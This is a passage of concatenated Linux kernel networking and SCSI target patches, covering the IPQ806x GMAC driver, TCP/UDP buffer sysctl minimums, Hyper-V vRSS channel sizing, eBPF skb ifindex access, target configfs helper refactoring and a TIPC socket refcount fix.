{ + case PHY_INTERFACE_MODE_RGMII: + val |= NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL; + break; + case PHY_INTERFACE_MODE_SGMII: + val &= ~NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL; + break; + default: + dev_err(&pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return NULL; + } + regmap_write(gmac->nss_common, NSS_COMMON_GMAC_CTL(gmac->id), val); + + /* Configure the clock src according to the mode */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_SRC_CTRL, &val); + val &= ~NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + switch (gmac->phy_mode) { + case PHY_INTERFACE_MODE_RGMII: + val |= NSS_COMMON_CLK_SRC_CTRL_RGMII(gmac->id) << + NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + break; + case PHY_INTERFACE_MODE_SGMII: + val |= NSS_COMMON_CLK_SRC_CTRL_SGMII(gmac->id) << + NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + break; + default: + dev_err(&pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return NULL; + } + regmap_write(gmac->nss_common, NSS_COMMON_CLK_SRC_CTRL, val); + + /* Enable PTP clock */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val |= NSS_COMMON_CLK_GATE_PTP_EN(gmac->id); + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + if (gmac->phy_mode == PHY_INTERFACE_MODE_SGMII) { + regmap_write(gmac->qsgmii_csr, QSGMII_PHY_SGMII_CTL(gmac->id), + QSGMII_PHY_CDR_EN | + QSGMII_PHY_RX_FRONT_EN | + QSGMII_PHY_RX_SIGNAL_DETECT_EN | + QSGMII_PHY_TX_DRIVER_EN | + QSGMII_PHY_QSGMII_EN | + 0x4 << QSGMII_PHY_PHASE_LOOP_GAIN_OFFSET | + 0x3 << QSGMII_PHY_RX_DC_BIAS_OFFSET | + 0x1 << QSGMII_PHY_RX_INPUT_EQU_OFFSET | + 0x2 << QSGMII_PHY_CDR_PI_SLEW_OFFSET | + 0xC << QSGMII_PHY_TX_DRV_AMP_OFFSET); + } + + return gmac; +} + +static void ipq806x_gmac_fix_mac_speed(void *priv, unsigned int speed) +{ + struct ipq806x_gmac *gmac = priv; + + 
ipq806x_gmac_set_speed(gmac, speed); +} + +static const struct stmmac_of_data ipq806x_gmac_data = { + .has_gmac = 1, + .setup = ipq806x_gmac_setup, + .fix_mac_speed = ipq806x_gmac_fix_mac_speed, +}; + +static const struct of_device_id ipq806x_gmac_dwmac_match[] = { + { .compatible = "qcom,ipq806x-gmac", .data = &ipq806x_gmac_data }, + { } +}; +MODULE_DEVICE_TABLE(of, ipq806x_gmac_dwmac_match); + +static struct platform_driver ipq806x_gmac_dwmac_driver = { + .probe = stmmac_pltfr_probe, + .remove = stmmac_pltfr_remove, + .driver = { + .name = "ipq806x-gmac-dwmac", + .pm = &stmmac_pltfr_pm_ops, + .of_match_table = ipq806x_gmac_dwmac_match, + }, +}; +module_platform_driver(ipq806x_gmac_dwmac_driver); + +MODULE_AUTHOR("Mathieu Olivari "); +MODULE_DESCRIPTION("Qualcomm Atheros IPQ806x DWMAC specific glue layer"); +MODULE_LICENSE("Dual BSD/GPL"); From 95e130af03b103138ae0d188ef012e5994fe970d Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:50 -0700 Subject: [PATCH 485/872] net: stmmac: ipq806x: document device tree bindings Add the device tree bindings documentation for the QCA IPQ806x variant of the Synopsys DesignWare MAC. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- .../devicetree/bindings/net/ipq806x-dwmac.txt | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 Documentation/devicetree/bindings/net/ipq806x-dwmac.txt diff --git a/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt b/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt new file mode 100644 index 000000000000..6d7ab4e524d4 --- /dev/null +++ b/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt @@ -0,0 +1,35 @@ +* IPQ806x DWMAC Ethernet controller + +The device inherits all the properties of the dwmac/stmmac devices +described in the file net/stmmac.txt with the following changes. + +Required properties: + +- compatible: should be "qcom,ipq806x-gmac" along with "snps,dwmac" + and any applicable more detailed version number + described in net/stmmac.txt + +- qcom,nss-common: should contain a phandle to a syscon device mapping the + nss-common registers. + +- qcom,qsgmii-csr: should contain a phandle to a syscon device mapping the + qsgmii-csr registers. + +Example: + + gmac: ethernet@37000000 { + device_type = "network"; + compatible = "qcom,ipq806x-gmac"; + reg = <0x37000000 0x200000>; + interrupts = ; + interrupt-names = "macirq"; + + qcom,nss-common = <&nss_common>; + qcom,qsgmii-csr = <&qsgmii_csr>; + + clocks = <&gcc GMAC_CORE1_CLK>; + clock-names = "stmmaceth"; + + resets = <&gcc GMAC_CORE1_RESET>; + reset-names = "stmmaceth"; + }; From 8133534c760d4083f79d2cde42c636ccc0b2792e Mon Sep 17 00:00:00 2001 From: Sorin Dumitru Date: Wed, 27 May 2015 22:16:49 +0300 Subject: [PATCH 486/872] net: limit tcp/udp rmem/wmem to SOCK_{RCV,SND}BUF_MIN This is similar to b1cb59cf2efe(net: sysctl_net_core: check SNDBUF and RCVBUF for min length). I don't think too small values can cause crashes in the case of udp and tcp, but I've seen this set to too small values which triggered awful performance. It also makes the setting consistent across all the wmem/rmem sysctls. Signed-off-by: Sorin Dumitru Signed-off-by: David S. 
Miller --- net/ipv4/sysctl_net_ipv4.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index 0330ab2e2b63..433231ccfb17 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -41,6 +41,8 @@ static int tcp_syn_retries_min = 1; static int tcp_syn_retries_max = MAX_TCP_SYNCNT; static int ip_ping_group_range_min[] = { 0, 0 }; static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX }; +static int min_sndbuf = SOCK_MIN_SNDBUF; +static int min_rcvbuf = SOCK_MIN_RCVBUF; /* Update system visible IP port range */ static void set_local_port_range(struct net *net, int range[2]) @@ -528,7 +530,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_tcp_wmem), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one, + .extra1 = &min_sndbuf, }, { .procname = "tcp_notsent_lowat", @@ -543,7 +545,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_tcp_rmem), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one, + .extra1 = &min_rcvbuf, }, { .procname = "tcp_app_win", @@ -756,7 +758,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_udp_rmem_min), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one + .extra1 = &min_rcvbuf, }, { .procname = "udp_wmem_min", @@ -764,7 +766,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_udp_wmem_min), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one + .extra1 = &min_sndbuf, }, { } }; From e01ec2199ef22e2cabd7d6e68a192f3eb728029f Mon Sep 17 00:00:00 2001 From: KY Srinivasan Date: Wed, 27 May 2015 13:16:57 -0700 Subject: [PATCH 487/872] hv_netvsc: Properly size the vrss queues The current algorithm for deciding on the number of VRSS channels is not optimal since we open up the min of number of CPUs online and the number of VRSS channels the host is offering. So on a 32 VCPU guest we could potentially open 32 VRSS subchannels. Experimentation has shown that it is best to limit the number of VRSS channels to the number of CPUs within a NUMA node. Here is the new algorithm for deciding on the number of sub-channels we would open up: 1) Pick the minimum of what the host is offering and what the driver in the guest is specifying as the default value. 2) Pick the minimum of (1) and the numbers of CPUs in the NUMA node the primary channel is bound to. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. 
Miller --- drivers/net/hyperv/hyperv_net.h | 1 + drivers/net/hyperv/netvsc_drv.c | 4 ++++ drivers/net/hyperv/rndis_filter.c | 16 ++++++++++++++-- 3 files changed, 19 insertions(+), 2 deletions(-) diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h index ddcc7f8d22b4..dd4544085db3 100644 --- a/drivers/net/hyperv/hyperv_net.h +++ b/drivers/net/hyperv/hyperv_net.h @@ -161,6 +161,7 @@ struct netvsc_device_info { unsigned char mac_adr[ETH_ALEN]; bool link_state; /* 0 - link up, 1 - link down */ int ring_size; + u32 max_num_vrss_chns; }; enum rndis_device_state { diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c index d9c88bc09f45..358475ed9b59 100644 --- a/drivers/net/hyperv/netvsc_drv.c +++ b/drivers/net/hyperv/netvsc_drv.c @@ -46,6 +46,8 @@ static int ring_size = 128; module_param(ring_size, int, S_IRUGO); MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)"); +static int max_num_vrss_chns = 8; + static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE | NETIF_MSG_LINK | NETIF_MSG_IFUP | NETIF_MSG_IFDOWN | NETIF_MSG_RX_ERR | @@ -755,6 +757,7 @@ static int netvsc_change_mtu(struct net_device *ndev, int mtu) ndevctx->device_ctx = hdev; hv_set_drvdata(hdev, ndev); device_info.ring_size = ring_size; + device_info.max_num_vrss_chns = max_num_vrss_chns; rndis_filter_device_add(hdev, &device_info); netif_tx_wake_all_queues(ndev); @@ -975,6 +978,7 @@ static int netvsc_probe(struct hv_device *dev, /* Notify the netvsc driver of the new device */ device_info.ring_size = ring_size; + device_info.max_num_vrss_chns = max_num_vrss_chns; ret = rndis_filter_device_add(dev, &device_info); if (ret != 0) { netdev_err(net, "unable to add netvsc device (ret %d)\n", ret); diff --git a/drivers/net/hyperv/rndis_filter.c b/drivers/net/hyperv/rndis_filter.c index 9118cea91882..006c1b8c2385 100644 --- a/drivers/net/hyperv/rndis_filter.c +++ b/drivers/net/hyperv/rndis_filter.c @@ -1013,6 +1013,9 @@ int rndis_filter_device_add(struct hv_device *dev, struct ndis_recv_scale_cap rsscap; u32 rsscap_size = sizeof(struct ndis_recv_scale_cap); u32 mtu, size; + u32 num_rss_qs; + const struct cpumask *node_cpu_mask; + u32 num_possible_rss_qs; rndis_device = get_rndis_device(); if (!rndis_device) @@ -1100,9 +1103,18 @@ int rndis_filter_device_add(struct hv_device *dev, if (ret || rsscap.num_recv_que < 2) goto out; + num_rss_qs = min(device_info->max_num_vrss_chns, rsscap.num_recv_que); + net_device->max_chn = rsscap.num_recv_que; - net_device->num_chn = (num_online_cpus() < rsscap.num_recv_que) ? - num_online_cpus() : rsscap.num_recv_que; + + /* + * We will limit the VRSS channels to the number CPUs in the NUMA node + * the primary channel is currently bound to. + */ + node_cpu_mask = cpumask_of_node(cpu_to_node(dev->channel->target_cpu)); + num_possible_rss_qs = cpumask_weight(node_cpu_mask); + net_device->num_chn = min(num_possible_rss_qs, num_rss_qs); + if (net_device->num_chn == 1) goto out; From 37e82c2f974b72c9ab49c787ef7b5bb1aec12768 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Wed, 27 May 2015 15:30:39 -0700 Subject: [PATCH 488/872] bpf: allow BPF programs access skb->skb_iif and skb->dev->ifindex fields classic BPF already exposes skb->dev->ifindex via SKF_AD_IFINDEX extension. Allow eBPF program to access it as well. Note that classic aborts execution of the program if 'skb->dev == NULL' (which is inconvenient for program writers), whereas eBPF returns zero in such case. 
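As a rough illustration, a socket-filter style eBPF program can now read the field straight from struct __sk_buff. This is only a sketch; the program name, the interface index value and the loader/section boilerplate are assumptions, not part of this patch:

	#include <linux/bpf.h>

	/* Keep only packets received on an assumed ifindex of 2.
	 * skb->ifindex reads as 0 when skb->dev is NULL, instead of
	 * aborting the program as classic BPF would. */
	int ifindex_filter(struct __sk_buff *skb)
	{
		if (skb->ifindex != 2)
			return 0;	/* drop */
		return -1;		/* accept the whole packet */
	}
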
Also expose the 'skb_iif' field, since programs triggered by redirected packet need to known the original interface index. Summary: __skb->ifindex -> skb->dev->ifindex __skb->ingress_ifindex -> skb->skb_iif Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- include/uapi/linux/bpf.h | 2 ++ net/core/filter.c | 18 ++++++++++++++++++ 2 files changed, 20 insertions(+) diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index f0a9af8b4dae..72f3080afa1e 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -236,6 +236,8 @@ struct __sk_buff { __u32 vlan_tci; __u32 vlan_proto; __u32 priority; + __u32 ingress_ifindex; + __u32 ifindex; }; #endif /* _UAPI__LINUX_BPF_H__ */ diff --git a/net/core/filter.c b/net/core/filter.c index 3adcca6f17a4..2c30d6632d66 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1499,6 +1499,24 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, offsetof(struct sk_buff, priority)); break; + case offsetof(struct __sk_buff, ingress_ifindex): + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, skb_iif) != 4); + + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, skb_iif)); + break; + + case offsetof(struct __sk_buff, ifindex): + BUILD_BUG_ON(FIELD_SIZEOF(struct net_device, ifindex) != 4); + + *insn++ = BPF_LDX_MEM(bytes_to_bpf_size(FIELD_SIZEOF(struct sk_buff, dev)), + dst_reg, src_reg, + offsetof(struct sk_buff, dev)); + *insn++ = BPF_JMP_IMM(BPF_JEQ, dst_reg, 0, 1); + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, dst_reg, + offsetof(struct net_device, ifindex)); + break; + case offsetof(struct __sk_buff, mark): return convert_skb_access(SKF_AD_MARK, dst_reg, src_reg, insn); From f4fb874cf076f9eafdd15c0a88cd0f0397b95e43 Mon Sep 17 00:00:00 2001 From: Vivien Didelot Date: Wed, 27 May 2015 21:07:26 -0400 Subject: [PATCH 489/872] if_vlan: fix vlaue -> value typo Fixes "vlaue" for "value" in include/linux/if_vlan.h. Signed-off-by: Vivien Didelot Signed-off-by: David S. 
Miller --- include/linux/if_vlan.h | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h index b9ab677c0c0a..a40d29846ac2 100644 --- a/include/linux/if_vlan.h +++ b/include/linux/if_vlan.h @@ -416,7 +416,7 @@ static inline void __vlan_hwaccel_put_tag(struct sk_buff *skb, /** * __vlan_get_tag - get the VLAN ID that is part of the payload * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if the skb is not of VLAN type */ @@ -435,7 +435,7 @@ static inline int __vlan_get_tag(const struct sk_buff *skb, u16 *vlan_tci) /** * __vlan_hwaccel_get_tag - get the VLAN ID that is in @skb->cb[] * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if @skb->vlan_tci is not set correctly */ @@ -456,7 +456,7 @@ static inline int __vlan_hwaccel_get_tag(const struct sk_buff *skb, /** * vlan_get_tag - get the VLAN ID from the skb * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if the skb is not VLAN tagged */ From d588cf8f618d7b316743a0bc99fede20f7a01bb7 Mon Sep 17 00:00:00 2001 From: Christoph Hellwig Date: Sun, 3 May 2015 08:50:52 +0200 Subject: [PATCH 490/872] target: Fix se_tpg_tfo->tf_subsys regression + remove tf_subsystem There is just one configfs subsystem in the target code, so we might as well add two helpers to reference / unreference it from the core code instead of passing pointers to it around. This fixes a regression introduced for v4.1-rc1 with commit 9ac8928e6, where configfs_depend_item() callers using se_tpg_tfo->tf_subsys would fail, because the assignment from the original target_core_subsystem[] is no longer happening at target_register_template() time. 
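For callers the conversion is mechanical; a sketch of the before/after pattern (mirroring the tcm_qla2xxx and vhost-scsi hunks below):

	/* before: every fabric caller had to pass the configfs subsystem */
	ret = configfs_depend_item(se_tpg->se_tpg_tfo->tf_subsys,
				   &se_tpg->tpg_group.cg_item);
	...
	configfs_undepend_item(se_tpg->se_tpg_tfo->tf_subsys,
			       &se_tpg->tpg_group.cg_item);

	/* after: the core wraps its single target_core_fabrics subsystem */
	ret = target_depend_item(&se_tpg->tpg_group.cg_item);
	...
	target_undepend_item(&se_tpg->tpg_group.cg_item);
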
(Fix target_core_exit_configfs pointer dereference - Sagi) Signed-off-by: Christoph Hellwig Reported-by: Himanshu Madhani Signed-off-by: Nicholas Bellinger --- drivers/scsi/qla2xxx/tcm_qla2xxx.c | 6 ++--- drivers/target/target_core_configfs.c | 30 ++++++++++++------------- drivers/target/target_core_internal.h | 3 --- drivers/target/target_core_pr.c | 32 ++++++--------------------- drivers/target/target_core_xcopy.c | 15 +++++-------- drivers/vhost/scsi.c | 6 ++--- include/target/target_core_configfs.h | 2 -- include/target/target_core_fabric.h | 4 +++- 8 files changed, 34 insertions(+), 64 deletions(-) diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c index 68c2002e78bf..5c9e680aa375 100644 --- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c +++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c @@ -1020,8 +1020,7 @@ static void tcm_qla2xxx_depend_tpg(struct work_struct *work) struct se_portal_group *se_tpg = &base_tpg->se_tpg; struct scsi_qla_host *base_vha = base_tpg->lport->qla_vha; - if (!configfs_depend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item)) { + if (!target_depend_item(&se_tpg->tpg_group.cg_item)) { atomic_set(&base_tpg->lport_tpg_enabled, 1); qlt_enable_vha(base_vha); } @@ -1037,8 +1036,7 @@ static void tcm_qla2xxx_undepend_tpg(struct work_struct *work) if (!qlt_stop_phase1(base_vha->vha_tgt.qla_tgt)) { atomic_set(&base_tpg->lport_tpg_enabled, 0); - configfs_undepend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + target_undepend_item(&se_tpg->tpg_group.cg_item); } complete(&base_tpg->tpg_base_comp); } diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c index ddaf76a4ac2a..1580077971f8 100644 --- a/drivers/target/target_core_configfs.c +++ b/drivers/target/target_core_configfs.c @@ -212,10 +212,6 @@ static struct config_group *target_core_register_fabric( pr_debug("Target_Core_ConfigFS: REGISTER -> Allocated Fabric:" " %s\n", tf->tf_group.cg_item.ci_name); - /* - * Setup tf_ops.tf_subsys pointer for usage with configfs_depend_item() - */ - tf->tf_ops.tf_subsys = tf->tf_subsys; tf->tf_fabric = &tf->tf_group.cg_item; pr_debug("Target_Core_ConfigFS: REGISTER -> Set tf->tf_fabric" " for %s\n", name); @@ -291,10 +287,17 @@ static struct configfs_subsystem target_core_fabrics = { }, }; -struct configfs_subsystem *target_core_subsystem[] = { - &target_core_fabrics, - NULL, -}; +int target_depend_item(struct config_item *item) +{ + return configfs_depend_item(&target_core_fabrics, item); +} +EXPORT_SYMBOL(target_depend_item); + +void target_undepend_item(struct config_item *item) +{ + return configfs_undepend_item(&target_core_fabrics, item); +} +EXPORT_SYMBOL(target_undepend_item); /*############################################################################## // Start functions called by external Target Fabrics Modules @@ -467,7 +470,6 @@ int target_register_template(const struct target_core_fabric_ops *fo) * struct target_fabric_configfs->tf_cit_tmpl */ tf->tf_module = fo->module; - tf->tf_subsys = target_core_subsystem[0]; snprintf(tf->tf_name, TARGET_FABRIC_NAME_SIZE, "%s", fo->name); tf->tf_ops = *fo; @@ -2870,7 +2872,7 @@ static int __init target_core_init_configfs(void) { struct config_group *target_cg, *hba_cg = NULL, *alua_cg = NULL; struct config_group *lu_gp_cg = NULL; - struct configfs_subsystem *subsys; + struct configfs_subsystem *subsys = &target_core_fabrics; struct t10_alua_lu_gp *lu_gp; int ret; @@ -2878,7 +2880,6 @@ static int __init target_core_init_configfs(void) " 
Engine: %s on %s/%s on "UTS_RELEASE"\n", TARGET_CORE_VERSION, utsname()->sysname, utsname()->machine); - subsys = target_core_subsystem[0]; config_group_init(&subsys->su_group); mutex_init(&subsys->su_mutex); @@ -3008,13 +3009,10 @@ static int __init target_core_init_configfs(void) static void __exit target_core_exit_configfs(void) { - struct configfs_subsystem *subsys; struct config_group *hba_cg, *alua_cg, *lu_gp_cg; struct config_item *item; int i; - subsys = target_core_subsystem[0]; - lu_gp_cg = &alua_lu_gps_group; for (i = 0; lu_gp_cg->default_groups[i]; i++) { item = &lu_gp_cg->default_groups[i]->cg_item; @@ -3045,8 +3043,8 @@ static void __exit target_core_exit_configfs(void) * We expect subsys->su_group.default_groups to be released * by configfs subsystem provider logic.. */ - configfs_unregister_subsystem(subsys); - kfree(subsys->su_group.default_groups); + configfs_unregister_subsystem(&target_core_fabrics); + kfree(target_core_fabrics.su_group.default_groups); core_alua_free_lu_gp(default_lu_gp); default_lu_gp = NULL; diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h index 874a9bc988d8..68bd7f5d9f73 100644 --- a/drivers/target/target_core_internal.h +++ b/drivers/target/target_core_internal.h @@ -4,9 +4,6 @@ /* target_core_alua.c */ extern struct t10_alua_lu_gp *default_lu_gp; -/* target_core_configfs.c */ -extern struct configfs_subsystem *target_core_subsystem[]; - /* target_core_device.c */ extern struct mutex g_device_mutex; extern struct list_head g_device_list; diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index c1aa9655e96e..b7c81acf08d0 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -1367,41 +1367,26 @@ void core_scsi3_free_all_registrations( static int core_scsi3_tpg_depend_item(struct se_portal_group *tpg) { - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &tpg->tpg_group.cg_item); + return target_depend_item(&tpg->tpg_group.cg_item); } static void core_scsi3_tpg_undepend_item(struct se_portal_group *tpg) { - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - &tpg->tpg_group.cg_item); - + target_undepend_item(&tpg->tpg_group.cg_item); atomic_dec_mb(&tpg->tpg_pr_ref_count); } static int core_scsi3_nodeacl_depend_item(struct se_node_acl *nacl) { - struct se_portal_group *tpg = nacl->se_tpg; - if (nacl->dynamic_node_acl) return 0; - - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &nacl->acl_group.cg_item); + return target_depend_item(&nacl->acl_group.cg_item); } static void core_scsi3_nodeacl_undepend_item(struct se_node_acl *nacl) { - struct se_portal_group *tpg = nacl->se_tpg; - - if (nacl->dynamic_node_acl) { - atomic_dec_mb(&nacl->acl_pr_ref_count); - return; - } - - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - &nacl->acl_group.cg_item); - + if (!nacl->dynamic_node_acl) + target_undepend_item(&nacl->acl_group.cg_item); atomic_dec_mb(&nacl->acl_pr_ref_count); } @@ -1419,8 +1404,7 @@ static int core_scsi3_lunacl_depend_item(struct se_dev_entry *se_deve) nacl = lun_acl->se_lun_nacl; tpg = nacl->se_tpg; - return configfs_depend_item(tpg->se_tpg_tfo->tf_subsys, - &lun_acl->se_lun_group.cg_item); + return target_depend_item(&lun_acl->se_lun_group.cg_item); } static void core_scsi3_lunacl_undepend_item(struct se_dev_entry *se_deve) @@ -1438,9 +1422,7 @@ static void core_scsi3_lunacl_undepend_item(struct se_dev_entry *se_deve) nacl = lun_acl->se_lun_nacl; tpg = nacl->se_tpg; - configfs_undepend_item(tpg->se_tpg_tfo->tf_subsys, - 
&lun_acl->se_lun_group.cg_item); - + target_undepend_item(&lun_acl->se_lun_group.cg_item); atomic_dec_mb(&se_deve->pr_ref_count); } diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c index a600ff15dcfd..8fd680ac941b 100644 --- a/drivers/target/target_core_xcopy.c +++ b/drivers/target/target_core_xcopy.c @@ -58,7 +58,6 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op bool src) { struct se_device *se_dev; - struct configfs_subsystem *subsys = target_core_subsystem[0]; unsigned char tmp_dev_wwn[XCOPY_NAA_IEEE_REGEX_LEN], *dev_wwn; int rc; @@ -90,8 +89,7 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op " se_dev\n", xop->src_dev); } - rc = configfs_depend_item(subsys, - &se_dev->dev_group.cg_item); + rc = target_depend_item(&se_dev->dev_group.cg_item); if (rc != 0) { pr_err("configfs_depend_item attempt failed:" " %d for se_dev: %p\n", rc, se_dev); @@ -99,8 +97,8 @@ static int target_xcopy_locate_se_dev_e4(struct se_cmd *se_cmd, struct xcopy_op return rc; } - pr_debug("Called configfs_depend_item for subsys: %p se_dev: %p" - " se_dev->se_dev_group: %p\n", subsys, se_dev, + pr_debug("Called configfs_depend_item for se_dev: %p" + " se_dev->se_dev_group: %p\n", se_dev, &se_dev->dev_group); mutex_unlock(&g_device_mutex); @@ -373,7 +371,6 @@ static int xcopy_pt_get_cmd_state(struct se_cmd *se_cmd) static void xcopy_pt_undepend_remotedev(struct xcopy_op *xop) { - struct configfs_subsystem *subsys = target_core_subsystem[0]; struct se_device *remote_dev; if (xop->op_origin == XCOL_SOURCE_RECV_OP) @@ -381,11 +378,11 @@ static void xcopy_pt_undepend_remotedev(struct xcopy_op *xop) else remote_dev = xop->src_dev; - pr_debug("Calling configfs_undepend_item for subsys: %p" + pr_debug("Calling configfs_undepend_item for" " remote_dev: %p remote_dev->dev_group: %p\n", - subsys, remote_dev, &remote_dev->dev_group.cg_item); + remote_dev, &remote_dev->dev_group.cg_item); - configfs_undepend_item(subsys, &remote_dev->dev_group.cg_item); + target_undepend_item(&remote_dev->dev_group.cg_item); } static void xcopy_pt_release_cmd(struct se_cmd *se_cmd) diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c index 5e19bb53b3a9..ea32b386797f 100644 --- a/drivers/vhost/scsi.c +++ b/drivers/vhost/scsi.c @@ -1409,8 +1409,7 @@ vhost_scsi_set_endpoint(struct vhost_scsi *vs, * dependency now. */ se_tpg = &tpg->se_tpg; - ret = configfs_depend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + ret = target_depend_item(&se_tpg->tpg_group.cg_item); if (ret) { pr_warn("configfs_depend_item() failed: %d\n", ret); kfree(vs_tpg); @@ -1513,8 +1512,7 @@ vhost_scsi_clear_endpoint(struct vhost_scsi *vs, * to allow vhost-scsi WWPN se_tpg->tpg_group shutdown to occur. 
*/ se_tpg = &tpg->se_tpg; - configfs_undepend_item(se_tpg->se_tpg_tfo->tf_subsys, - &se_tpg->tpg_group.cg_item); + target_undepend_item(&se_tpg->tpg_group.cg_item); } if (match) { for (i = 0; i < VHOST_SCSI_MAX_VQ; i++) { diff --git a/include/target/target_core_configfs.h b/include/target/target_core_configfs.h index 25bb04c4209e..b99c01170392 100644 --- a/include/target/target_core_configfs.h +++ b/include/target/target_core_configfs.h @@ -40,8 +40,6 @@ struct target_fabric_configfs { struct config_item *tf_fabric; /* Passed from fabric modules */ struct config_item_type *tf_fabric_cit; - /* Pointer to target core subsystem */ - struct configfs_subsystem *tf_subsys; /* Pointer to fabric's struct module */ struct module *tf_module; struct target_core_fabric_ops tf_ops; diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h index 17c7f5ac7ea0..0f4dc3768587 100644 --- a/include/target/target_core_fabric.h +++ b/include/target/target_core_fabric.h @@ -4,7 +4,6 @@ struct target_core_fabric_ops { struct module *module; const char *name; - struct configfs_subsystem *tf_subsys; char *(*get_fabric_name)(void); u8 (*get_fabric_proto_ident)(struct se_portal_group *); char *(*tpg_get_wwn)(struct se_portal_group *); @@ -109,6 +108,9 @@ struct target_core_fabric_ops { int target_register_template(const struct target_core_fabric_ops *fo); void target_unregister_template(const struct target_core_fabric_ops *fo); +int target_depend_item(struct config_item *item); +void target_undepend_item(struct config_item *item); + struct se_session *transport_init_session(enum target_prot_op); int transport_alloc_session_tags(struct se_session *, unsigned int, unsigned int); From 1ea23a21176e449685a9d0523ab6da83e3779eb1 Mon Sep 17 00:00:00 2001 From: Ying Xue Date: Thu, 28 May 2015 13:19:22 +0800 Subject: [PATCH 491/872] tipc: unconditionally put sock refcnt when sock timer to be deleted is pending As sock refcnt is taken when sock timer is started in sk_reset_timer(), the sock refcnt should be put when sock timer to be deleted is in pending state no matter what "probing_state" value of tipc sock is. Reviewed-by: Erik Hugne Reviewed-by: Jon Maloy Signed-off-by: Ying Xue Signed-off-by: David S. Miller --- net/tipc/socket.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 9370f953e16f..30ea82a9b0f1 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -410,7 +410,7 @@ static int tipc_release(struct socket *sock) struct net *net; struct tipc_sock *tsk; struct sk_buff *skb; - u32 dnode, probing_state; + u32 dnode; /* * Exit if socket isn't fully initialized (occurs when a failed accept() @@ -448,10 +448,7 @@ static int tipc_release(struct socket *sock) } tipc_sk_withdraw(tsk, 0, NULL); - probing_state = tsk->probing_state; - if (del_timer_sync(&sk->sk_timer) && - probing_state != TIPC_CONN_PROBING) - sock_put(sk); + sk_stop_timer(sk, &sk->sk_timer); 